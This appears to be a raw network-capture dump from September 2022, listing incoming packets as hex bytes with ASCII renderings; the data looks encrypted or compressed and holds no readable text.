                                                                                                                                                            2022-09-29 12:45:07 UTC13796INData Raw: 97 75 ad a7 11 c5 bc e8 3e 36 ad 0d 8d 5b 75 ec 0a 2f 73 9c a5 9e a2 4f 88 fc 54 06 d8 1d e6 27 85 f1 b1 3c 79 d6 db a3 c6 b4 fe 76 d2 8b 3c 3d ba 63 30 d5 77 65 f0 b3 d3 cd 26 e1 88 9f 36 22 12 e9 68 2d a5 2b ae d4 97 d9 b2 f2 c5 33 80 e5 be c1 cb 7d 02 76 83 aa 83 bc d0 b1 e6 3a 59 3c fa 1d 7f 07 3c 62 6e 7d 04 65 a7 34 b1 38 ab f6 69 19 21 e9 44 a7 9a 82 e0 c1 bd 24 32 da b6 58 17 d3 4d 83 47 0f 23 b3 60 62 b7 d2 19 4f 64 8b 9b 65 42 d1 d2 7c 00 71 97 e4 c1 57 f3 38 7e dc e9 7e 48 78 d2 76 6e 69 2b 02 b0 a1 c2 b8 4f bc a1 d5 be 26 a6 a7 4a 12 2d 23 fb 1a 2b 3a 87 f8 07 14 bb e2 05 70 44 d6 ea e0 ec ea 11 b1 cb 68 70 41 61 53 3c a1 44 af db 05 3c 71 6d fc 22 07 78 f2 38 68 bb 84 ac 10 d1 f0 0b 80 bf 33 86 91 33 63 58 40 8a 63 ef 50 b1 d4 dd aa 8b 35 f0
                                                                                                                                                            Data Ascii: u>6[u/sOT'<yv<=c0we&6"h-+3}v:Y<<bn}e48i!D$2XMG#`bOdeB|qW8~~Hxvni+O&J-#+:pDhpAaS<D<qm"x8h33cX@cP5
                                                                                                                                                            2022-09-29 12:45:07 UTC13812INData Raw: d7 30 53 ca 5d 4c 91 aa 3e 55 92 19 05 9e f8 1b fc 9f e0 83 a5 1f e4 c8 ef eb 97 28 6c 2f e0 86 c5 81 a5 b3 97 b2 7d 4f 88 f0 53 dc 0f e6 eb b3 60 dc b1 70 2f 59 03 8e 7b b1 7c fc 2d 86 9c 23 4c df 38 b3 c3 db 0e d2 13 c4 c3 60 f3 e9 5e df 06 6e 04 a2 b0 e2 45 db 4b 6c fa 4f 86 a6 60 a6 f1 93 34 bc 94 00 36 b5 1a 20 d5 7a a3 1f c2 02 55 f7 4c e3 36 8b 80 f7 6b 1c 12 45 0b 95 e6 96 ae 86 50 cb 44 22 8a a5 f6 6a c3 d0 6b 66 49 1c 23 f8 3c 11 13 7b 89 0d 47 98 95 42 8a db 71 35 90 69 a9 59 01 b9 31 29 eb aa 5b 84 f5 8d e7 bc 4d 06 17 ea c3 e0 ab 32 e9 00 cf 30 34 ad 4e b7 bc c2 02 c3 62 89 78 7c 9a 22 fc d2 d1 0b 3d 37 6a 26 c0 bf 25 c8 e2 aa eb 16 40 70 58 81 18 d8 e2 f2 ce f2 78 3c 74 75 13 23 bb 77 f6 7e c0 64 bf 44 09 a3 ba 8e be f1 02 6b 11 61 37 48 a4
                                                                                                                                                            Data Ascii: 0S]L>U(l/}OS`p/Y{|-#L8`^nEKlO`46 zUL6kEPD"jkfI#<{GBq5iY1)[M204Nbx|"=7j&%@pXx<tu#w~dDka7H
                                                                                                                                                            2022-09-29 12:45:07 UTC13828INData Raw: 67 93 56 0f 44 60 b1 96 4f 9b 83 88 1e c0 ed 28 33 c5 a6 32 92 a0 0a 95 d8 9f dc b8 64 49 59 b8 a9 77 f8 d4 ac 38 4d 43 c8 20 4e c8 d6 fd bd b5 96 57 53 3b 81 35 c4 cb 49 2c 5b d6 26 8b 2e f1 98 c3 f4 25 e5 3e 0d 22 97 e2 cd c5 95 68 d2 d3 30 b8 46 01 e8 66 57 60 b1 c7 91 06 90 ff 0f b3 2b 16 16 e7 71 55 79 1b a8 ef f8 00 dd 9a 1d 89 86 7f 13 c8 32 db a6 e2 00 d6 d0 61 c3 69 0f 30 94 36 45 77 00 e8 4b fd 20 fe c1 e1 50 cc 5f 89 37 5d f8 04 2e f8 8e 3c e9 d7 8c c4 d4 83 4b bb 45 d2 fc ac bf 17 7e 50 75 51 43 07 44 30 0e c7 42 49 bf d2 00 8d 03 94 45 5b 6b 7c 47 06 5d 72 5a 04 74 2b 26 d9 8b f0 61 4b 92 16 ae 22 8d c3 b1 5e b2 fb 8f d4 f0 be 6f 17 7c 37 ee 7c a3 64 40 a1 ab 91 d0 4f 60 1a 39 9d 1b 65 7d 98 80 ee d7 a3 7a a1 90 6e 93 fb 0a 90 79 86 61 83 62
                                                                                                                                                            Data Ascii: gVD`O(32dIYw8MC NWS;5I,[&.%>"h0FfW`+qUy2ai06EwK P_7].<KE~PuQCD0BIE[k|G]rZt+&aK"^o|7|d@O`9e}znyab
                                                                                                                                                            2022-09-29 12:45:07 UTC13844INData Raw: a2 00 de b6 78 63 d1 5d b0 41 4d 0e bd 49 e4 f5 60 9e 44 4f 20 34 02 d8 38 c5 4e 28 ba a2 c1 1c 43 97 18 80 d6 95 48 47 a6 c0 ec 07 de a0 08 74 5e 92 94 48 c0 cd b8 c4 33 08 cd e4 61 a3 4e da 3b b2 3c 6c c0 f7 fe 25 64 3d f7 39 5b c2 aa 9f 62 03 32 35 b5 92 90 01 63 04 25 bf e3 1e 74 09 41 c3 64 25 73 6e 2c ba dc 65 cb 6d fa 66 56 13 c8 a9 d5 01 04 20 dc 86 bd bc 54 cc 61 4f 76 57 7c 3e 3a c3 da 48 5d 67 f1 b3 84 58 c0 4c 0c d8 da 12 23 80 0b 2d d5 3d 15 4e 08 bf 0d 08 e8 28 51 f4 96 78 e4 f4 35 ec 7c fd b4 96 f5 17 ce da 65 ce 9c b1 11 ec 48 ba 81 9c 28 0b b6 bf 87 46 91 34 8e d3 cb 10 22 3d 30 95 35 9b c4 a3 ce 79 ac e0 78 40 26 3e 8c 45 41 53 6a 25 c8 d4 1a 09 f9 6c 3b f4 56 4c ea f3 b9 b2 f3 59 e6 b5 3b a2 66 70 3f e7 7c 8f 82 68 41 dc b5 2a 59 56 e1
                                                                                                                                                            Data Ascii: xc]AMI`DO 48N(CHGt^H3aN;<l%d=9[b25c%tAd%sn,emfV TaOvW|>:H]gXL#-=N(Qx5|eH(F4"=05yx@&>EASj%l;VLY;fp?|hA*YV
                                                                                                                                                            2022-09-29 12:45:07 UTC13860INData Raw: 2b 06 b7 74 5b b1 32 02 42 d9 31 1e c1 88 18 ac f6 9f 36 40 a7 20 be 25 53 77 26 de 53 4b 6b 60 d9 4d 5e 57 70 f1 88 aa c5 9c 81 4c be b9 a7 46 92 a2 97 50 b9 f0 22 9e c6 d7 68 87 6f 68 3b a3 b4 78 e8 37 2b 8f a5 59 45 63 15 ca 16 25 4f 17 c3 16 a4 52 b8 4f e2 80 90 29 1c 63 c5 68 01 5b 1d 14 75 b1 cb 92 ac c4 4d 82 f3 d3 6f 88 47 ff e6 69 6b 8a f9 82 02 70 57 95 09 21 ce 3f 1f 8d b6 44 15 e6 03 ef 39 fb ca 22 0c ae a3 45 e7 d6 d7 cd 77 c2 07 68 40 94 01 7d ca a0 63 8f fb da c7 88 2e 9b 0f fc ac 53 5e 4d 47 5c 15 0c d8 31 4a 9c 00 1a c2 b4 00 fc e0 d0 e2 ca 75 82 4e 5c 7a a2 1a 1b 65 48 01 85 64 a3 7f 7b 5e 82 15 fc 2b e3 a9 e9 23 41 d3 3b 38 c2 52 0c 8e 50 aa d6 c5 86 63 b1 cc bf 8f a6 b3 0e f7 f4 6b 92 e4 d1 ab 51 06 3e 3c a7 4c 5f 5b ef 28 0d 77 86 fd
                                                                                                                                                            Data Ascii: +t[2B16@ %Sw&SKk`M^WpLFP"hoh;x7+YEc%ORO)ch[uMoGikpW!?D9"Ewh@}c.S^MG\1JuN\zeHd{^+#A;8RPckQ><L_[(w
                                                                                                                                                            2022-09-29 12:45:07 UTC13876INData Raw: 56 5d dc 90 62 13 06 d6 1d c7 dd 57 62 72 f1 5d 76 e9 c0 4f 6e ec 16 30 b5 34 4e cc 2d 45 70 4e 97 21 1b 24 1b fa 2c 5e 96 7f c4 b2 0a c1 94 87 30 79 2d 96 bf 04 ae 29 75 47 ea cd 6e aa 4a 63 42 07 be d2 ee 5b 02 57 8f d3 d8 5b 75 81 c1 8a 0a 78 8b 0d 35 59 11 2e 59 6c 7c 2d c5 5c 07 f0 d2 cc 5d 4a 72 08 13 11 4c 2e ad 7e 3b 0a c2 c4 9b 46 ec de 8b ed 49 28 a7 6f f0 b9 45 2a 1c 92 34 67 78 32 04 22 76 55 54 5b 57 86 3c c0 1e b8 fb e3 c0 d9 f8 82 ff a8 38 e4 4a 55 15 e4 33 25 ba 11 28 9e b1 6b 5d 38 49 7c e6 93 7b 5d bf 80 12 85 40 9e e3 f8 69 fe 12 13 18 07 5b ac ac ea d5 47 93 bf 3a aa dd f5 a0 c7 54 1f 7a a1 e4 8b 0f 64 5a 5a a9 e1 ed 52 87 3b a0 f1 50 bc d9 c5 ba 89 6a e7 8c 61 47 25 8b f6 18 ad 5f 8c 4b ed e1 28 88 8f e1 e5 f3 e3 f2 a1 5b e2 d9 6e 55
                                                                                                                                                            Data Ascii: V]bWbr]vOn04N-EpN!$,^0y-)uGnJcB[W[ux5Y.Yl|-\]JrL.~;FI(oE*4gx2"vUT[W<8JU3%(k]8I|{]@i[G:TzdZZR;PjaG%_K([nU
                                                                                                                                                            2022-09-29 12:45:07 UTC13892INData Raw: 72 14 e9 59 5e f5 b6 9d 49 c6 d9 83 36 b0 7f f2 bd 5d 1a 59 7b 57 43 e7 77 b6 9c db c0 6a 31 32 bb a5 fc 1a 5f ec 43 e1 c6 72 a7 25 00 e1 ba f7 9c 4c 30 4b 14 9f b7 10 56 2c cd 24 56 34 db 36 c3 b0 45 20 2b 92 ba db df 8b 87 06 be ff 72 9e 9f b4 f5 e8 7d 2f 62 07 2f ae a7 b3 bc 73 ba f7 18 34 46 16 ee 28 ae 35 30 21 cf 3c ba 29 14 d8 56 35 a6 c3 75 a9 a4 86 f2 12 b7 80 1d ad b6 de 67 60 e2 c8 b3 8d e4 54 bf 18 ee fd 6d ea 71 0a 5a 33 17 74 15 06 54 f4 1d 10 be 14 54 2b f8 c0 f7 76 ba 18 5d fa 88 ca ec fc 94 5f d6 55 bd 42 9e 57 d1 a1 2e 11 ac 14 1f e5 78 03 f7 ab 44 47 77 4a fd ca 7b 95 94 58 84 d6 a1 ad 17 ba 2c 42 77 9d 6b a7 df c8 fb fd 82 c5 21 08 f8 6d f3 19 39 6c 77 71 31 ea a7 e5 ea 2f ac 0d a2 42 c4 18 2b 65 f0 44 0d 53 69 91 e9 22 ef 5b ed f1 63
                                                                                                                                                            Data Ascii: rY^I6]Y{WCwj12_Cr%L0KV,$V46E +r}/b/s4F(50!<)V5ug`TmqZ3tTT+v]_UBW.xDGwJ{X,Bwk!m9lwq1/B+eDSi"[c
                                                                                                                                                            2022-09-29 12:45:07 UTC13908INData Raw: 6d 34 2e 99 67 60 08 f2 96 aa f2 1d a3 db 5e c5 ca 4c ae 3f ae 03 8f 0b 8a ae 8f 29 dd aa ce 28 aa cd 7d ff a1 04 c0 5b 63 38 b4 97 49 bf 82 a9 9c ed 5b 9c 7f f1 1b ef 06 1d 96 0b 45 82 40 0b d9 11 11 4c aa f2 26 14 5e b8 32 3b ed 36 ed 6f cd 97 1f 61 f2 51 ee 34 c1 e3 19 18 44 35 13 7f b7 d1 a1 cb 4a 0a ad ad cf 34 00 0c eb 6a e1 6c da 3b 8d c8 28 30 35 00 fa c6 38 80 16 d8 40 3f ed 50 61 53 1d a8 c1 81 60 cf 9b 57 f4 d3 75 d0 d7 e1 b7 e3 e9 c1 ed ba 4e 57 d6 bc fb ec 9e 44 84 88 4c ca a5 40 79 a8 d4 44 a8 76 d2 57 71 f9 b4 40 69 2e 78 66 79 46 d4 37 4d 3a 28 31 55 1b b3 6d 0b 7d 8d 45 34 9c 8b fb a8 37 36 52 7d 84 83 c9 47 36 3c 95 8a 46 85 1f 5a 5e 43 4e 46 ec f7 66 56 80 f7 e6 ab 98 a0 b0 52 9d 69 82 23 22 c8 d1 c4 47 f3 f4 fa 07 6f 01 c6 71 75 d2 d6
                                                                                                                                                            Data Ascii: m4.g`^L?)(}[c8I[E@L&^2;6oaQ4D5J4jl;(058@?PaS`WuNWDL@yDvWq@i.xfyF7M:(1Um}E476R}G6<FZ^CNFfVRi#"Goqu
                                                                                                                                                            2022-09-29 12:45:07 UTC13924INData Raw: 6f af f8 c8 e7 00 e1 a9 c4 ec 4d f7 81 f1 b9 b0 3b 36 db c7 73 95 8f b3 78 f6 40 9a 11 0a 6f 6c ed f3 f8 0e 28 e5 de 46 db f1 ee 5b 37 16 60 6e d7 33 80 23 cb de f8 06 7a 0c 2f d2 b6 ab 81 f9 1c ec b5 0b a1 2d 7d b9 eb 98 c7 ca 2f 61 08 31 a1 14 bd 35 3d 92 fc ff 66 53 eb 3e 0e 62 43 08 31 7c 7f 79 94 a4 e5 3b 87 95 b7 1a 28 97 32 84 46 0a 46 ca 6b 1b 4c 6b e1 b7 5e d6 24 c0 77 b6 8f 61 df 16 c5 70 1a c7 3d bb 88 8b d7 dd 23 c0 01 c3 45 88 94 d2 b7 d2 3b b2 88 a4 db dd af c1 8d bc e1 15 22 cb 11 b0 00 1c 60 c1 56 16 56 f0 5c f6 c6 94 6d a1 97 22 1b bd 6b 15 3f e3 74 88 b6 c0 cb 36 c5 1e 0e f0 ff 07 c1 00 da fb f5 df 86 a1 2f df 45 bf 0a dc ec 6d fd 3d 71 1c fa 9b c2 25 69 9e 92 0e d2 33 c2 9e 41 cf ee 1a 04 a3 f4 00 89 b1 13 6a 34 32 19 a4 69 bc ae dc b9
                                                                                                                                                            Data Ascii: oM;6sx@ol(F[7`n3#z/-}/a15=fS>bC1|y;(2FFkLk^$wap=#E;"`VV\m"k?t6/Em=q%i3Aj42i
                                                                                                                                                            2022-09-29 12:45:07 UTC13940INData Raw: a4 62 52 04 3e 12 71 77 6b 7d 59 eb f3 3f b3 7c cc f4 c1 5d 17 60 7f 5b b7 e2 79 ca f5 53 dc d7 6e 51 33 30 ec 0b d3 43 d5 8e b7 04 ea 4d ed cb dd 2a 67 02 8b 0b b8 4a 98 ae f6 b6 c6 aa 2d 1a 4f 65 25 38 ee 07 fd 27 ba e0 9c 8e 41 64 31 9a 08 3b 4c 67 cd be 2f c5 4c 7e 4a 06 99 03 1b ad af c3 50 da ea 5c 8c 65 91 06 ac c0 bc a8 ce 68 f4 17 90 9d 63 c9 63 d6 34 b7 b4 f2 bf 7a 68 81 f7 ca af cd 71 40 59 d5 e1 de a7 ab 76 8e c0 c9 9b e4 dc f5 0c b4 0c f2 49 4b ee 52 cd 21 0f 8a eb c8 80 db 29 da 55 f5 ee a8 38 98 d1 f0 e4 a4 53 b3 c6 dd 4a c8 40 3b ae 7f 8e 97 a0 a9 bc 28 b6 5f 33 dd e3 d2 a7 33 f7 d0 5e c5 75 70 3a 93 ad 9a 14 5f a2 23 9c 58 c2 7d ea b1 5d c6 0f 30 18 85 a6 f4 4c 70 b2 6d 30 50 02 1d 7c 51 4d 15 bd 0d 6c 56 cd 61 f6 95 ad c7 5e f9 82 f1 a6
                                                                                                                                                            Data Ascii: bR>qwk}Y?|]`[ySnQ30CM*gJ-Oe%8'Ad1;Lg/L~JP\ehcc4zhq@YvIKR!)U8SJ@;(_33^up:_#X}]0Lpm0P|QMlVa^
                                                                                                                                                            2022-09-29 12:45:07 UTC13956INData Raw: 6c 4f 1d 6c 4f 9a d6 6c 3e 11 e7 b1 f5 d0 41 31 8a bd bb 24 80 d6 f0 55 df f9 7a cf cc 18 9a 07 d5 df 11 b5 08 5e a1 cb 44 de 6b 6f 94 8f d0 7b 8e d7 00 79 5a 9c 24 3c 92 a6 61 cc 48 45 b1 46 2c 3e 3b 83 35 a6 a2 5c 7a 43 4b a9 29 8b 9a 87 3b 8c 2b f2 7f bf 53 45 30 f5 63 59 4d ee f6 38 dc 78 9e 98 05 bc 6e eb 53 79 e5 25 33 c1 4d 86 c9 77 82 8b 7d eb 70 69 79 a9 99 05 42 f9 14 95 5f ab b5 f5 f5 ea f9 bd ae 84 f4 14 63 39 88 0b 31 02 ce 6c 33 65 a3 59 29 76 ca 6d 4a d1 62 11 ef bc 79 40 6e 3f 36 1a 0e 8a 76 fb 70 f9 c5 14 b7 f9 a6 66 14 83 8b 59 71 5d a6 c4 4a ed 53 6a 1a 2a bd f0 5f 82 04 f5 81 ea 18 5d e1 33 da 6e 14 82 53 46 56 85 69 d9 50 55 70 d6 1e c8 b9 06 83 c8 f5 f6 53 44 9e 00 54 44 49 f7 a8 8a 90 a5 b4 8f a6 1b b1 eb 67 73 0e 8f a2 53 b7 68 0e
                                                                                                                                                            Data Ascii: lOlOl>A1$Uz^Dko{yZ$<aHEF,>;5\zCK);+SE0cYM8xnSy%3Mw}piyB_c91l3eY)vmJby@n?6vpfYq]JSj*_]3nSFViPUpSDTDIgsSh
                                                                                                                                                            2022-09-29 12:45:07 UTC13966INData Raw: 98 50 6b d0 b9 73 60 96 97 08 55 d1 dd c2 18 82 f3 bc 62 75 6a 15 40 a3 f1 ef bc 5b fb ce d4 a4 ac 72 68 ba 0d a8 88 5a ff f4 3b 3d 60 80 db 3c 31 15 8d 6c 45 09 65 0b 82 50 9f a5 5a cd 71 30 eb df 58 55 8b 03 93 63 ea 9b 85 b1 32 f6 05 d1 6d 48 44 20 91 3c 4d 42 9f 20 27 49 34 33 9c fe 4d a8 4d 1d 1a 86 33 b0 e6 b1 62 2c 68 43 01 34 c0 38 2b fb 40 0e e6 83 80 a9 28 e3 2e 97 71 79 49 ad 8a d6 59 f8 07 da 0c ef 8a ab f2 a8 9f 26 6c 69 3e f2 f0 d4 af 71 4f bf dc 8f 4a 36 98 6f e7 9d 0a 54 70 64 37 66 43 5d e5 58 d5 dd 74 c4 1c 6e 79 27 7d 7a 79 80 ce f8 0f dd 9c 01 22 89 05 9c 57 14 43 8b fd 85 34 1c 91 28 0f aa d4 bf 91 b0 4a 7c 0f 3c 4e a7 60 f2 15 ae 4c 32 f4 3c ff f1 31 ef fd b8 51 a0 df bf 07 a9 78 83 5b da 29 72 b4 0f 0f 00 a2 9f c1 26 3a 04 aa c4 da
                                                                                                                                                            Data Ascii: Pks`Ubuj@[rhZ;=`<1lEePZq0XUc2mHD <MB 'I43MM3b,hC48+@(.qyIY&li>qOJ6oTpd7fC]Xtny'}zy"WC4(J|<N`L2<1Qx[)r&:
                                                                                                                                                            2022-09-29 12:45:07 UTC13982INData Raw: 6b 33 19 1f a8 50 55 a7 a2 a0 01 a5 c1 23 ee a9 ad 2d 74 f6 9a b5 41 2d 05 50 40 08 f2 b1 98 e3 e3 68 e0 e0 2d 93 8b 6d 35 22 7b 5a a4 37 bd 16 90 36 c2 4d 85 7b d1 8b a1 32 f1 1a 11 6c 7b 2a 94 a7 14 45 0b c3 f0 7f 39 e0 11 80 eb 96 b5 30 df 20 e8 cc 47 8f 00 e0 f5 55 d9 18 d3 96 9b de b4 f4 22 a2 53 89 1f 20 82 36 14 be 5b e6 53 10 af fc 37 f8 bb 2c 31 1b 10 60 1b d0 cd 81 73 39 6c 16 38 fb eb 28 5e d7 05 0d 2d a2 b2 80 4a e0 33 a8 be 69 7b 99 52 db 22 e6 36 06 7e 47 4c 79 7b 40 88 33 e6 54 f3 dd 17 32 73 fe af 11 d6 70 c2 17 f7 a0 47 21 35 b2 04 e2 61 6b 9a 11 b2 b2 0f e7 9e 1b 1d b0 32 cc 63 ca 54 ff fc 47 fa 88 c7 fe a8 a1 b7 e7 b7 ac b2 43 96 ce 93 75 41 e0 5b 7c 16 d6 5a b8 bf e4 e3 f6 62 2a 82 e3 58 39 fc 58 cf 9e 89 34 ec 9f 99 b2 59 70 54 9a 6b
                                                                                                                                                            Data Ascii: k3PU#-tA-P@h-m5"{Z76M{2l{*E90 GU"S 6[S7,1`s9l8(^-J3i{R"6~GLy{@3T2spG!5ak2cTGCuA[|Zb*X9X4YpTk
                                                                                                                                                            2022-09-29 12:45:07 UTC13998INData Raw: 14 02 bd bf 9b 86 b6 69 20 a4 9e 14 70 83 65 2d cd 80 b2 a2 70 2f e0 e1 bb 3d b7 26 70 3d 7c a6 76 29 0c c3 f5 dd 2a 2c 5f 07 6c b9 8a f2 25 05 2d f2 f1 b8 6c 3c c4 57 d5 3b 5f 37 07 df 4f b1 af 52 74 5d 8c d1 76 9a f5 5a 94 c1 d8 b9 b4 03 77 b2 c4 4d e0 65 7b 49 e6 d9 7d 37 f0 aa 5d b4 61 85 7d 55 de 25 00 ab 72 10 fb 31 5e 86 8d 62 f3 9e 54 2a 6f d5 97 9a 82 10 e9 92 ac 88 3c cb 63 2a 92 a5 aa 83 e1 86 82 49 62 db 0b 23 79 07 ea b9 c0 06 fb ce 41 21 72 19 4f a3 16 54 89 19 88 19 0f 4d 96 18 3c 1b 39 8e bd 68 76 51 aa 8d 18 f1 14 d4 9f 87 3f 86 5c e6 f7 5c d4 aa 52 3d 94 53 66 7e b5 42 53 64 7f 17 3e b5 20 e8 80 4e 75 ea 69 f2 11 c6 b2 38 fb 22 b1 8e cf ec ca 98 3b 18 77 3e a3 13 67 75 4a c8 e5 79 22 24 a2 29 dc 39 bd 3b 0c fa b0 09 17 93 65 27 cc ff 2a
                                                                                                                                                            Data Ascii: i pe-p/=&p=|v)*,_l%-l<W;_7ORt]vZwMe{I}7]a}U%r1^bT*o<c*Ib#yA!rOTM<9hvQ?\\R=Sf~BSd> Nui8";w>guJy"$)9;e'*
                                                                                                                                                            2022-09-29 12:45:07 UTC14002INData Raw: c5 78 a6 71 90 a9 85 e8 07 86 99 0c f1 d6 a6 c6 86 51 68 f9 5b 55 73 46 f3 8e 41 2f f5 69 22 bb 5f 05 19 5d a4 77 44 ea d0 53 42 4d 94 18 df 14 2a d5 84 ff f1 d4 f6 4e 1c 01 e7 f4 5e c9 29 a8 7d eb b8 2e ac 53 db ee 3e d5 dc 4b bf 17 cb dd 0b d0 e7 19 f2 c1 3b f6 b9 f4 39 3f a0 76 22 7f 46 e9 f7 69 17 4b fe 9f be 46 7f 54 79 a0 c2 c7 6f b4 15 a4 00 9d c3 14 2c 4d 84 87 d1 d4 64 34 61 9f d6 35 ad a4 3a b7 58 84 bc 8d d5 bd fb f1 74 eb ae ec 8c 42 08 ab f1 e1 4c e4 a7 79 15 e4 5b ae 13 e0 0c 02 07 8d e2 7f ba 46 7d e7 cd e9 2c 94 38 e1 c9 19 8d 16 64 ce a9 02 ee 11 3e df df 58 47 40 4e bd e4 ca 8e d1 4b 3b 6f 46 68 43 e3 50 b6 fd cd 5e 34 71 a4 cf 91 f5 64 34 ff 55 ba df a8 d5 72 47 cf 1f 10 83 c6 83 d2 5e bc 31 86 31 f3 0c e5 f5 05 a6 ab 59 0d 30 58 f3 f4
                                                                                                                                                            Data Ascii: xqQh[UsFA/i"_]wDSBM*N^)}.S>K;9?v"FiKFTyo,Md4a5:XtBLy[F},8d>XG@NK;oFhCP^4qd4UrG^11Y0X
                                                                                                                                                            2022-09-29 12:45:07 UTC14018INData Raw: c1 72 64 23 16 bb 04 40 4b 6f 74 c5 d4 b5 c6 98 a5 94 6d e7 d8 6f 75 ed 5c d3 20 5e b6 33 7b 61 4a ab 6f 58 c4 cc 15 92 75 a1 43 a0 23 21 53 c6 14 28 0c 30 3f 61 30 d2 7c 58 2a f7 10 14 21 d1 94 1f 00 bf c0 71 17 ca 39 92 77 8f 6b df 86 84 d3 d8 5b 06 37 2a c5 69 b6 af 44 47 95 3f d9 a4 87 5e ae 57 10 08 d3 a4 33 07 d4 26 d8 20 8c 5d 73 4f fe e9 bc 40 55 6c ba dc 25 15 33 3e 6d ac a8 5c 88 be f1 ab 78 3e a8 a0 32 5c 1d 85 b5 7c fe af 72 f5 4b 36 05 84 51 76 ae bd b0 30 a0 a4 38 35 f6 5b 00 83 bc f0 1e db 78 0e 92 df 2a c2 51 6c b5 1c b9 72 3e ae ef 26 1b dc 20 72 21 6f 4a 29 ac 8a 02 53 42 20 95 5b 59 5d e7 24 7b f6 ef 5e 00 72 b9 e7 f3 f1 84 a8 b3 97 16 69 40 7e a2 98 c2 b9 3a 00 6d 8c 84 9c 95 4f f1 d2 44 ac a0 a9 8b 4e 49 c0 49 9f a5 45 26 6a 0d 3d bb
                                                                                                                                                            Data Ascii: rd#@Kotmou\ ^3{aJoXuC#!S(0?a0|X*!q9wk[7*iDG?^W3& ]sO@Ul%3>m\x>2\|rK6Qv085[x*Qlr>& r!oJ)SB [Y]${^ri@~:mODNIIE&j=
                                                                                                                                                            2022-09-29 12:45:07 UTC14034INData Raw: 35 c8 b8 81 b8 c2 a9 77 ed 3f 31 8a ed 42 55 ee e1 b4 c9 9c 67 5d 1d ba a4 0a 73 c6 84 c9 20 44 a6 82 97 39 35 ff 1a ff 2a 4f 63 98 e0 ef 22 a1 e4 13 d3 3b b4 0b 4b e3 78 44 3d a1 35 7d 36 3f 3f 2e d3 f6 40 84 c3 19 a0 52 09 e0 bc 59 73 05 0a 7e d6 78 56 18 83 64 48 f1 db 74 d9 ba 30 1e d9 8d 82 d1 83 05 a4 fe 4a 3b 4c 6f f0 5f f3 51 6a 1b c4 71 47 f5 a2 6a ad c7 8e d3 10 aa 29 28 77 bb cc bb 3b ec 1b ee cc 87 d6 91 df fd f5 b7 f7 15 e2 30 96 fc eb ec 36 fb fb 0f d1 19 b9 97 80 26 3a f2 f2 84 95 3d f5 68 fc 1e 32 3d 5a b1 72 8f d0 79 43 57 b3 50 2e 3f 6d fb c9 73 d8 24 5f bb 9e 45 83 46 d4 2b 23 24 3d 68 7a a4 f0 c9 a3 6d 82 b6 b0 93 32 d1 64 5d b6 03 82 d7 b3 10 35 62 81 f2 f3 df 49 45 a9 8c 6c 87 7e d8 38 ed 49 58 03 02 21 5a 53 24 5a 66 03 03 a8 fd 92
                                                                                                                                                            Data Ascii: 5w?1BUg]s D95*Oc";KxD=5}6??.@RYs~xVdHt0J;Lo_QjqGj)(w;06&:=h2=ZryCWP.?ms$_EF+#$=hzm2d]5bIEl~8IX!ZS$Zf
                                                                                                                                                            2022-09-29 12:45:07 UTC14050INData Raw: 0b 56 d8 b9 d6 e7 c6 c6 5f 6b 27 b8 28 2a 0b 53 97 bc 52 9b 5a 4f d6 53 83 cb 02 ce 2a f7 54 87 b2 e4 8c c9 4a 4f b4 cf 1c 92 e4 ec 25 1c 04 0e dc ca c1 73 d1 ee 58 76 01 b3 67 b4 dd 2b 6b 15 bb f0 7f 8f cf 2b 8b ec 06 b1 27 90 00 5c c0 86 66 32 b5 33 cf bc 8c 03 87 60 c2 f3 89 05 5c 19 0a 25 c8 7b 55 03 31 c1 08 17 96 1c 7c 02 89 03 ad d3 92 29 bb cf 3c a7 c2 aa df 1e 13 45 bb 67 d1 be 99 23 e4 a1 58 f4 ca 48 a3 d0 b2 f9 2c b0 2c fd 5c 83 cd 05 e3 dd 82 04 aa f1 8a c5 80 1d 88 c2 38 de dc fc 4e e3 8a d7 91 57 0f ba 6f 2a 90 d4 c6 be bf f3 32 a5 f3 ba cd d8 dd a8 f8 ea 78 c3 5e 0b 6c 40 2c 9b bf ea bc 69 0d 92 8d 76 bb ca b1 11 4c 61 4b a8 46 d6 5d 89 17 f9 cb 66 8a eb 77 8a c3 4c e9 f4 00 3e b9 fc b2 1f 6f a5 ef 12 61 2d ed 31 5a 69 1e 1c 8d 62 17 e7 97
                                                                                                                                                            Data Ascii: V_k'(*SRZOS*TJO%sXvg+k+'\f23`\%{U1|)<Eg#XH,,\8NWo*2x^l@,ivLaKF]fwL>oa-1Zib
                                                                                                                                                            2022-09-29 12:45:07 UTC14066INData Raw: 64 71 dc a6 08 3d eb 2c 07 32 20 3e 3a c9 71 87 b6 de 74 a0 61 b7 7a 9a 17 9f 90 f6 fb e9 83 79 74 19 96 2f 75 18 3c bb 6b 0a 25 20 da 01 50 77 39 1f c5 35 9d 5d 90 fd 9d 24 ec 5d 62 ab 60 e5 f6 20 eb aa 57 4b 3b 5d 6e 11 d7 2f 74 d3 d5 e8 59 b0 75 34 6a b6 11 63 14 21 b6 73 68 93 8f f5 b7 a5 da 9d 0e 8c 0e e6 b2 ee 12 1a 13 ef b3 9f ad d6 d4 47 9a 7a 77 3f 5b 73 eb 3c 9d 7d 9e 51 61 4f 13 8d 3c 77 7c 2f 56 cc f4 a0 27 e4 1b f3 e7 32 e1 3a ce 78 6b 71 97 ea 9a 92 a7 b4 16 38 41 c9 35 4c e5 6b e4 7d b3 a7 b1 2a 97 a5 23 fb fb 89 da aa cc 27 9a a2 9a 4e 01 99 4d 1e f0 c4 7f a1 83 64 bc 18 5b 52 4a 65 86 bc 0d 31 ef 62 cc 2b 56 a5 ae cb ef ef c4 d5 e2 29 f0 1d 56 7d 9f fd d7 c3 6c eb 0d 10 eb 88 d9 9c e5 11 52 c9 49 29 99 d8 63 c0 90 a0 08 66 fe 71 5c 98 51
                                                                                                                                                            Data Ascii: dq=,2 >:qtazyt/u<k% Pw95]$]b` WK;]n/tYu4jc!shGzw?[s<}QaO<w|/V'2:xkq8A5Lk}*#'NMd[RJe1b+V)V}lRI)cfq\Q
